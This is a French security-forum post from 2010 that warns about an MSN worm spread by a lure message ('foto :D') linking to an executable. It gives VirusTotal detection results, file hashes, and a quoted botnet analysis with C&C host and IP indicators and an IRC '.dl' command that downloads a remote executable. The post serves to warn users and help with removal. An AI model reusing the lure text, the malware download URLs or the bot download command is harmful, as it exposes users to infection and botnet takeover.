http://mypicsform.com/photo.exe

par **Malekal_morte** » 23 août 2010 16:59

Message envoyé aux contacts MSN :

foto :D http://mypicsform.com/photo.exe

ver MSN utilisant le [url=http://forum.malekal.com=http://forum.malekal.com/social-engineering-t4043.html]social engineering[/url] pour duper les utilisateurs MSN. N'ouvre pas de zip de photos, webcam etc... sur MSN, pour plus d'informations sur les infections MSN, voir ce lien : http://forum.malekal.com/virus-msn-expl ... t9130.html

Si l'internaute clic sur le lien hxxp://mypicsform.com/photo.exe le fichier, l'infection s'installe sur le système.

Pour supprimer cette infection, suivez la procédure de désinfection de la page suivante : https://www.malekal.com/VIRUS_MSN.php

http://www.virustotal.com/file-scan/rep ... 1282575321

Code : Tout sélectionner

File name: pic120410-jpg-www-facebook-com.scr
Submission date: 2010-08-23 14:55:21 (UTC)
Current status: queued queued (#13) analysing finished

Result: 6/ 41 (14.6%)

Compact Print results 
Antivirus Version Last Update Result 
AhnLab-V3 2010.08.23.06 2010.08.23 - 
AntiVir 8.2.4.38 2010.08.23 - 
Antiy-AVL 2.0.3.7 2010.08.23 - 
Authentium 5.2.0.5 2010.08.23 - 
Avast 4.8.1351.0 2010.08.22 - 
Avast5 5.0.332.0 2010.08.22 - 
AVG 9.0.0.851 2010.08.23 - 
BitDefender 7.2 2010.08.23 - 
CAT-QuickHeal 11.00 2010.08.23 - 
ClamAV 0.96.2.0-git 2010.08.23 - 
Comodo 5830 2010.08.23 - 
DrWeb 5.0.2.03300 2010.08.23 Trojan.DownLoad1.54810 
Emsisoft 5.0.0.37 2010.08.23 Trojan.Win32.Ircbrute!IK 
eSafe 7.0.17.0 2010.08.23 - 
eTrust-Vet 36.1.7808 2010.08.23 - 
F-Prot 4.6.1.107 2010.08.22 - 
F-Secure 9.0.15370.0 2010.08.23 - 
Fortinet 4.1.143.0 2010.08.23 - 
GData 21 2010.08.23 - 
Ikarus T3.1.1.88.0 2010.08.23 Trojan.Win32.Ircbrute 
Jiangmin 13.0.900 2010.08.23 - 
Kaspersky 7.0.0.125 2010.08.23 - 
McAfee 5.400.0.1158 2010.08.23 - 
McAfee-GW-Edition 2010.1B 2010.08.23 - 
Microsoft 1.6103 2010.08.23 - 
NOD32 5389 2010.08.23 Win32/TrojanDownloader.Small.OVZ 
Norman 6.05.11 2010.08.23 - 
nProtect 2010-08-23.01 2010.08.23 - 
Panda 10.0.2.7 2010.08.22 - 
PCTools 7.0.3.5 2010.08.23 Backdoor.LolBot 
Prevx 3.0 2010.08.23 - 
Rising 22.62.00.04 2010.08.23 - 
Sophos 4.56.0 2010.08.23 - 
Sunbelt 6778 2010.08.23 - 
SUPERAntiSpyware 4.40.0.1006 2010.08.23 - 
TheHacker 6.5.2.1.355 2010.08.23 - 
TrendMicro 9.120.0.1004 2010.08.23 - 
TrendMicro-HouseCall 9.120.0.1004 2010.08.23 - 
VBA32 3.12.14.0 2010.08.23 - 
ViRobot 2010.8.23.4003 2010.08.23 Trojan.Win32.Ircbrute.188416 
VirusBuster 5.0.27.0 2010.08.23 - 
Additional informationShow all  
MD5   : 6cb9467a0f345906542496dbc74f115c 
SHA1  : b0735985fdd4c053c63b479be32fd1a619774e67 
SHA256: a8394825676102b136d1bde3e2d9ca142c3374bd7d34a95f94ec5d1192a076b3 
ssdeep: 3072:LL9B/1pNwoBq3ZnkVO0aXa/oZ69VaTC+H2:/951pNfqJn0 
File size : 139264 bytes 

 User:Trendie 
Reputation:26 credits
Comment date:2010-08-23 04:59:51 (UTC)
60k Botnet
leader.cegran.com DNS_TYPE_A 208.96.57.50 212.117.180.123 212.117.180.211
208.96.57.50:81
Nick: n[AUS|XP]4711247
Username: s
Joined Channel: #newbin#
Joined Channel: #DEU
Channel Topic for Channel #newbin#: ".st"
Private Message to User n[AUS|XP]4711247: ".dl http://031919c.netsolhost.com/4531545.exe"
Private Message to User n[AUS|XP]4711247: ".dl"

Process Created
C:\Documents and Settings\Administrator\Application Data\lmsn.exe

Url download bot
http://mypicsform.com/photo.exe 
Tags: Malware, SpamAttachmentOrLink, IMpropagating[/quote]